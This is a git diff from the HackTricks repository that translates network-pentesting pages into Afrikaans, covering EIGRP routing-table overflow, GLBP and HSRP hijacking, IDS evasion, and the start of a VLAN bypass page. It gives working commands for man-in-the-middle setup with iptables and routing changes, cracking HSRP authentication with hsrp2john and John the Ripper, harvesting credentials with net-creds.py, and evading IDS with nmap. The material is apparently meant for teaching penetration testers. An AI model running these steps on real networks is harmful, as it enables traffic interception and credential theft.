Overflow Attack** +## **Roetertabel-oorloopaanval** -- **Objective**: To strain the router's CPU and RAM by flooding the routing table with numerous false routes. -- **Tool**: **routingtableoverflow.py** script. -- **Execution**: - %%%bash - sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 - %%% +- **Doelwit**: Om die roeterverwerker se CPU en RAM te belas deur die roetertabel met talle valse roetes te oorstroom. +- **Instrument**: **routingtableoverflow.py**-skrips. +- **Uitvoering**: +%%%bash +sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 +%%% - **Parameters**: - - `--interface`: Specifies the network interface. - - `--as`: Defines the EIGRP AS number. - - `--src`: Sets the attacker’s IP address. +- `--interface`: Spesifiseer die netwerkinterface. +- `--as`: Definieer die EIGRP AS-nommer. +- `--src`: Stel die aanvaller se IP-adres in.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md index a9f7f8255..e88fd0277 100644 --- a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md @@ -1,63 +1,62 @@ -# GLBP & HSRP Attacks +# GLBP & HSRP Aanvalle
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## FHRP Hijacking Overview +## FHRP Kapingsoorsig -### Insights into FHRP -FHRP is designed to provide network robustness by merging multiple routers into a single virtual unit, thereby enhancing load distribution and fault tolerance. Cisco Systems introduced prominent protocols in this suite, such as GLBP and HSRP. +### Insig in FHRP +FHRP is ontwerp om netwerk-robuustheid te bied deur verskeie roeteryers in 'n enkele virtuele eenheid te kombineer, wat sodoende lasverspreiding en fouttoleransie verbeter. Cisco Systems het prominente protokolle in hierdie pakket geïntroduceer, soos GLBP en HSRP. -### GLBP Protocol Insights -Cisco's creation, GLBP, functions on the TCP/IP stack, utilizing UDP on port 3222 for communication. Routers in a GLBP group exchange "hello" packets at 3-second intervals. If a router fails to send these packets for 10 seconds, it is presumed to be offline. However, these timers are not fixed and can be modified. +### GLBP-protokol-insig +GLBP, 'n skepping van Cisco, werk op die TCP/IP-stapel en maak gebruik van UDP op poort 3222 vir kommunikasie. Roeteryers in 'n GLBP-groep ruil "hallo" pakkies uit met tussenposes van 3 sekondes. As 'n roeteryer nie hierdie pakkies vir 10 sekondes stuur nie, word dit as aflyn beskou. Hierdie tydmetings is egter nie vas nie en kan gewysig word. -### GLBP Operations and Load Distribution -GLBP stands out by enabling load distribution across routers using a single virtual IP coupled with multiple virtual MAC addresses. In a GLBP group, every router is involved in packet forwarding. Unlike HSRP/VRRP, GLBP offers genuine load balancing through several mechanisms: +### GLBP-bedrywighede en lasverspreiding +GLBP onderskei homself deur lasverspreiding oor roeteryers moontlik te maak deur gebruik te maak van 'n enkele virtuele IP gekoppel aan verskeie virtuele MAC-adresse. In 'n GLBP-groep is elke roeteryer betrokke by pakketsending. In teenstelling met HSRP/VRRP bied GLBP ware lasbalansering deur verskeie meganismes: -- **Host-Dependent Load Balancing:** Maintains consistent AVF MAC address assignment to a host, essential for stable NAT configurations. -- **Round-Robin Load Balancing:** The default approach, alternating AVF MAC address assignment among requesting hosts. -- **Weighted Round-Robin Load Balancing:** Distributes load based on predefined "Weight" metrics. +- **Gasheer-afhanklike lasbalansering:** Handhaaf 'n konstante AVF MAC-adres toewysing aan 'n gasheer, wat noodsaaklik is vir stabiele NAT-konfigurasies. +- **Round-Robin Lasbalansering:** Die verstekbenadering, waar AVF MAC-adres toewysing afwisselend aan versoekende gasheerders gedoen word. +- **Geweegde Round-Robin Lasbalansering:** Versprei die las gebaseer op voorafbepaalde "Gewig" metriek. -### Key Components and Terminologies in GLBP -- **AVG (Active Virtual Gateway):** The main router, responsible for allocating MAC addresses to peer routers. -- **AVF (Active Virtual Forwarder):** A router designated to manage network traffic. -- **GLBP Priority:** A metric that determines the AVG, starting at a default of 100 and ranging between 1 and 255. -- **GLBP Weight:** Reflects the current load on a router, adjustable either manually or through Object Tracking. -- **GLBP Virtual IP Address:** Serves as the network's default gateway for all connected devices. +### Sleutelkomponente en terminologieë in GLBP +- **AVG (Aktiewe Virtuele Gateway):** Die hoofroeteryer, verantwoordelik vir die toekenning van MAC-adresse aan eweknie-roeteryers. +- **AVF (Aktiewe Virtuele Stuurder):** 'n Roeteryer wat aangewys is om netwerkverkeer te bestuur. +- **GLBP-prioriteit:** 'n Metriek wat die AVG bepaal, begin by 'n verstekwaarde van 100 en wissel tussen 1 en 255. +- **GLBP-gewig:** Weerspieël die huidige las op 'n roeteryer, wat handmatig of deur middel van Objekopsporing aangepas kan word. +- **GLBP Virtuele IP-adres:** Diens as die netwerk se verstekpoort vir alle gekoppelde toestelle. -For interactions, GLBP employs the reserved multicast address 224.0.0.102 and UDP port 3222. Routers transmit "hello" packets at 3-second intervals, and are considered non-operational if a packet is missed over a 10-second duration. +Vir interaksie maak GLBP gebruik van die voorbehoude multicast-adres 224.0.0.102 en UDP-poort 3222. Roeteryers stuur "hallo" pakkies uit met tussenposes van 3 sekondes, en word as nie-operasioneel beskou as 'n pakkie oor 'n tydperk van 10 sekondes gemis word. -### GLBP Attack Mechanism -An attacker can become the primary router by sending a GLBP packet with the highest priority value (255). This can lead to DoS or MITM attacks, allowing traffic interception or redirection. +### GLBP-aanvalsmeganisme +'n Aanvaller kan die primêre roeteryer word deur 'n GLBP-pakket met die hoogste prioriteitswaarde (255) te stuur. Dit kan lei tot DoS- of MITM-aanvalle, wat verkeersonderskepping of omleiding moontlik maak. -### Executing a GLBP Attack with Loki -[Loki](https://github.com/raizo62/loki_on_kali) can perform a GLBP attack by injecting a packet with priority and weight set to 255. Pre-attack steps involve gathering information like the virtual IP address, authentication presence, and router priority values using tools like Wireshark. +### Uitvoering van 'n GLBP-aanval met Loki +[Loki](https://github.com/raizo62/loki_on_kali) kan 'n GLBP-aanval uitvoer deur 'n pakket in te spuit met prioriteit en gewig wat op 255 gestel is. Voor-aanvalstappe behels die versameling van inligting soos die virtuele IP-adres, die teenwoordigheid van verifikasie en die prioriteitswaardes van die roeteryer deur middel van hulpmiddels soos Wireshark. -Attack Steps: -1. Switch to promiscuous mode and enable IP forwarding. -2. Identify the target router and retrieve its IP. -3. Generate a Gratuitous ARP. -4. Inject a malicious GLBP packet, impersonating the AVG. -5. Assign a secondary IP address to the attacker's network interface, mirroring the GLBP virtual IP. -6. Implement SNAT for complete traffic visibility. -7. Adjust routing to ensure continued internet access through the original AVG router. +Aanvalstappe: +1. Skakel na promiskueuse modus en aktiveer IP-deurstuur. +2. Identifiseer die teikenroeteryer en haal sy IP op. +3. Genereer 'n Gratis ARP. +4. Spuit 'n kwaadwillige GLBP-pakket in, wat die AVG naboots. +5. Ken 'n sekondêre IP-adres toe aan die aanvaller se netwerkinterface, wat die GLBP virtuele IP naboots. +6. Implementeer SNAT vir volledige verkeersigbaarheid. +7. Pas roetebepaling aan om voortgesette internettoegang deur die oorspronklike AVG-roeteryer te verseker. -By following these steps, the attacker positions themselves as a "man in the middle," capable of intercepting and analyzing network traffic, including unencrypted or sensitive data. - -For demonstration, here are the required command snippets: +Deur hierdie stappe te volg, plaas die aanvaller homself as 'n "man in die middel", wat in staat is om netwerkverkeer te onderskep en te analiseer, insluitend onversleutelde of sensitiewe data. +Vir demonstrasie, hier is die vereiste opdragfragmente: ```bash # Enable promiscuous mode and IP forwarding sudo ip link set eth0 promisc on @@ -71,82 +70,79 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sudo route del default sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 ``` +### Passiewe Verduideliking van HSRP-ontvoering met Opdragbesonderhede -Monitoring and intercepting traffic can be done using net-creds.py or similar tools to capture and analyze data flowing through the compromised network. +#### Oorsig van HSRP (Hot Standby Router/Redundancy Protocol) +HSRP is 'n Cisco-eienaardige protokol wat ontwerp is vir netwerkgateway-herstelbaarheid. Dit maak die konfigurasie van verskeie fisiese roeteryers moontlik in 'n enkele logiese eenheid met 'n gedeelde IP-adres. Hierdie logiese eenheid word bestuur deur 'n primêre router wat verantwoordelik is vir die rigting van verkeer. In teenstelling met GLBP, wat metriese soos prioriteit en gewig gebruik vir vragbalansering, steun HSRP op 'n enkele aktiewe router vir verkeersbestuur. -### Passive Explanation of HSRP Hijacking with Command Details +#### Rolle en Terminologie in HSRP +- **HSRP Aktiewe Router**: Die toestel wat as die gateway optree en verkeersvloei bestuur. +- **HSRP Standby Router**: 'n Rugsteunroeter wat gereed is om oor te neem as die aktiewe router misluk. +- **HSRP Groep**: 'n Stel roeteryers wat saamwerk om 'n enkele veerkragtige virtuele router te vorm. +- **HSRP MAC-adres**: 'n Virtuele MAC-adres wat aan die logiese router in die HSRP-opstelling toegewys is. +- **HSRP Virtuele IP-adres**: Die virtuele IP-adres van die HSRP-groep wat optree as die verstekroete vir gekoppelde toestelle. -#### Overview of HSRP (Hot Standby Router/Redundancy Protocol) -HSRP is a Cisco proprietary protocol designed for network gateway redundancy. It allows the configuration of multiple physical routers into a single logical unit with a shared IP address. This logical unit is managed by a primary router responsible for directing traffic. Unlike GLBP, which uses metrics like priority and weight for load balancing, HSRP relies on a single active router for traffic management. +#### HSRP-weergawes +HSRP kom in twee weergawes voor, HSRPv1 en HSRPv2, wat hoofsaaklik verskil in groepskapasiteit, multicast IP-gebruik en virtuele MAC-adresstruktuur. Die protokol maak gebruik van spesifieke multicast IP-adresse vir diensinligtinguitruiling, met Hello-pakette wat elke 3 sekondes gestuur word. 'n Router word as onaktief beskou as geen pakket binne 'n interval van 10 sekondes ontvang word nie. -#### Roles and Terminology in HSRP -- **HSRP Active Router**: The device acting as the gateway, managing traffic flow. -- **HSRP Standby Router**: A backup router, ready to take over if the active router fails. -- **HSRP Group**: A set of routers collaborating to form a single resilient virtual router. -- **HSRP MAC Address**: A virtual MAC address assigned to the logical router in the HSRP setup. -- **HSRP Virtual IP Address**: The virtual IP address of the HSRP group, acting as the default gateway for connected devices. +#### HSRP-aanvalsmeganisme +HSRP-aanvalle behels die gedwonge oorneem van die rol van die Aktiewe Router deur 'n maksimum prioriteitswaarde in te spuit. Dit kan lei tot 'n Man-In-The-Middle (MITM) aanval. Essensiële voor-aanvalstappe sluit in die versameling van data oor die HSRP-opstelling, wat gedoen kan word deur Wireshark vir verkeersanalise. -#### HSRP Versions -HSRP comes in two versions, HSRPv1 and HSRPv2, differing mainly in group capacity, multicast IP usage, and virtual MAC address structure. The protocol utilizes specific multicast IP addresses for service information exchange, with Hello packets sent every 3 seconds. A router is presumed inactive if no packet is received within a 10-second interval. +#### Stappe om HSRP-verifikasie te omseil +1. Stoor die netwerkverkeer wat HSRP-data bevat as 'n .pcap-lêer. +```shell +tcpdump -w hsrp_traffic.pcap +``` +2. Haal MD5-hashes uit die .pcap-lêer met behulp van hsrp2john.py. +```shell +python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes +``` +3. Kraak die MD5-hashes met behulp van John the Ripper. +```shell +john --wordlist=mywordlist.txt hsrp_hashes +``` -#### HSRP Attack Mechanism -HSRP attacks involve forcibly taking over the Active Router's role by injecting a maximum priority value. This can lead to a Man-In-The-Middle (MITM) attack. Essential pre-attack steps include gathering data about the HSRP setup, which can be done using Wireshark for traffic analysis. +**Uitvoering van HSRP-inspuiting met Loki** -#### Steps for Bypassing HSRP Authentication -1. Save the network traffic containing HSRP data as a .pcap file. - ```shell - tcpdump -w hsrp_traffic.pcap - ``` -2. Extract MD5 hashes from the .pcap file using hsrp2john.py. - ```shell - python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes - ``` -3. Crack the MD5 hashes using John the Ripper. - ```shell - john --wordlist=mywordlist.txt hsrp_hashes - ``` +1. Begin Loki om HSRP-advertensies te identifiseer. +2. Stel die netwerkinterface in promiskue modus en aktiveer IP-deurstuur. +```shell +sudo ip link set eth0 promisc on +sudo sysctl -w net.ipv4.ip_forward=1 +``` +3. Gebruik Loki om die spesifieke router te teiken, voer die gekraakte HSRP-wagwoord in en doen die nodige konfigurasies om die Aktiewe Router na te boots. +4. Nadat die Aktiewe Router-rol verkry is, konfigureer jou netwerkinterface en IP-tabelle om die wettige verkeer te onderskep. +```shell +sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0 +sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE +``` +5. Wysig die roetetabel om verkeer deur die vorige Aktiewe Router te roeteer. +```shell +sudo route del default +sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 +``` +6. Gebruik net-creds.py of 'n soortgelyke hulpprogram om legitimasie-inligting van die onderskepte verkeer vas te vang. +```shell +sudo python2 net-creds.py -i eth0 +``` -**Executing HSRP Injection with Loki** - -1. Launch Loki to identify HSRP advertisements. -2. Set the network interface to promiscuous mode and enable IP forwarding. - ```shell - sudo ip link set eth0 promisc on - sudo sysctl -w net.ipv4.ip_forward=1 - ``` -3. Use Loki to target the specific router, input the cracked HSRP password, and perform necessary configurations to impersonate the Active Router. -4. After gaining the Active Router role, configure your network interface and IP tables to intercept the legitimate traffic. - ```shell - sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0 - sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE - ``` -5. Modify the routing table to route traffic through the former Active Router. - ```shell - sudo route del default - sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 - ``` -6. Use net-creds.py or a similar utility to capture credentials from the intercepted traffic. - ```shell - sudo python2 net-creds.py -i eth0 - ``` - -Executing these steps places the attacker in a position to intercept and manipulate traffic, similar to the procedure for GLBP hijacking. This highlights the vulnerability in redundancy protocols like HSRP and the need for robust security measures. +Deur hierdie stappe uit te voer, plaas die aanvaller hom in 'n posisie om verkeer te onderskep en te manipuleer, soortgelyk aan die prosedure vir GLBP-ontvoering. Dit beklemtoon die kwesbaarheid in herstelbaarheidsprotokolle soos HSRP en die behoefte aan robuuste sekuriteitsmaatreëls. -## References +## Verwysings - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/generic-methodologies-and-resources/pentesting-network/ids-evasion.md b/generic-methodologies-and-resources/pentesting-network/ids-evasion.md index 118cdaa5b..97dc400d0 100644 --- a/generic-methodologies-and-resources/pentesting-network/ids-evasion.md +++ b/generic-methodologies-and-resources/pentesting-network/ids-evasion.md @@ -1,75 +1,71 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# **TTL Manipulation** +# **TTL-manipulasie** -Send some packets with a TTL enough to arrive to the IDS/IPS but not enough to arrive to the final system. And then, send another packets with the same sequences as the other ones so the IPS/IDS will think that they are repetitions and won't check them, but indeed they are carrying the malicious content. +Stuur 'n paar pakkies met 'n TTL wat genoeg is om by die IDS/IPS aan te kom, maar nie genoeg om by die finale stelsel aan te kom nie. En stuur dan nog pakkies met dieselfde volgorde as die ander sodat die IPS/IDS dink dat dit herhalings is en dit nie sal ondersoek nie, maar in werklikheid dra hulle die skadelike inhoud. -**Nmap option:** `--ttlvalue ` +**Nmap-opsie:** `--ttlvalue ` -# Avoiding signatures +# Ontwyk handtekeninge -Just add garbage data to the packets so the IPS/IDS signature is avoided. +Voeg net rommeldata by die pakkies sodat die IPS/IDS-handtekening vermy word. -**Nmap option:** `--data-length 25` +**Nmap-opsie:** `--data-length 25` -# **Fragmented Packets** +# **Gefragmenteerde pakkies** -Just fragment the packets and send them. If the IDS/IPS doesn't have the ability to reassemble them, they will arrive to the final host. +Fragmenteer net die pakkies en stuur hulle. As die IDS/IPS nie die vermoë het om hulle weer saam te stel nie, sal hulle by die finale gasheer aankom. -**Nmap option:** `-f` +**Nmap-opsie:** `-f` -# **Invalid** _**checksum**_ +# **Ongeldige** _**kontrolesom**_ -Sensors usually don't calculate checksum for performance reasons. So an attacker can send a packet that will be **interpreted by the sensor but rejected by the final host.** Example: +Sensors bereken gewoonlik nie kontrolesom vir prestasie-redes nie. 'n Aanvaller kan dus 'n pakkie stuur wat deur die sensor **geïnterpreteer word, maar deur die finale gasheer verwerp word.** Voorbeeld: -Send a packet with the flag RST and a invalid checksum, so then, the IPS/IDS may thing that this packet is going to close the connection, but the final host will discard the packet as the checksum is invalid. +Stuur 'n pakkie met die vlag RST en 'n ongeldige kontrolesom, sodat die IPS/IDS dalk dink dat hierdie pakkie die verbinding gaan sluit, maar die finale gasheer sal die pakkie verwerp omdat die kontrolesom ongeldig is. -# **Uncommon IP and TCP options** +# **Ongewone IP- en TCP-opsies** -A sensor might disregard packets with certain flags and options set within IP and TCP headers, whereas the destination host accepts the packet upon receipt. +'N Sensor kan pakkies met sekere vlae en opsies wat in IP- en TCP-koppe ingestel is, ignoreer, terwyl die bestemmingsgasheer die pakkie aanvaar wanneer dit ontvang word. -# **Overlapping** +# **Oorvleueling** -It is possible that when you fragment a packet, some kind of overlapping exists between packets (maybe first 8 bytes of packet 2 overlaps with last 8 bytes of packet 1, and 8 last bytes of packet 2 overlaps with first 8 bytes of packet 3). Then, if the IDS/IPS reassembles them in a different way than the final host, a different packet will be interpreted.\ -Or maybe, 2 packets with the same offset comes and the host has to decide which one it takes. +Dit is moontlik dat wanneer jy 'n pakkie fragmenteer, daar 'n soort oorvleueling tussen pakkies bestaan (miskien oorvleuel die eerste 8 byte van pakkie 2 met die laaste 8 byte van pakkie 1, en die laaste 8 byte van pakkie 2 oorvleuel met die eerste 8 byte van pakkie 3). As die IDS/IPS hulle anders as die finale gasheer weer saamstel, sal 'n ander pakkie geïnterpreteer word.\ +Of dalk kom 2 pakkies met dieselfde verskuiwing en die gasheer moet besluit watter een dit neem. -* **BSD**: It has preference for packets with smaller _offset_. For packets with same offset, it will choose the first one. -* **Linux**: Like BSD, but it prefers the last packet with the same offset. -* **First** (Windows): First value that comes, value that stays. -* **Last** (cisco): Last value that comes, value that stays. +* **BSD**: Dit het voorkeur vir pakkies met 'n kleiner _verskuiwing_. Vir pakkies met dieselfde verskuiwing, sal dit die eerste een kies. +* **Linux**: Soos BSD, maar dit verkies die laaste pakkie met dieselfde verskuiwing. +* **Eerste** (Windows): Eerste waarde wat kom, waarde wat bly. +* **Laaste** (cisco): Laaste waarde wat kom, waarde wat bly. -# Tools +# Hulpmiddels * [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md b/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md index b8f9dc297..ac50def36 100644 --- a/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md +++ b/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md @@ -1,45 +1,38 @@ -# Lateral VLAN Segmentation Bypass +# Laterale VLAN-segmentering omseil
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud 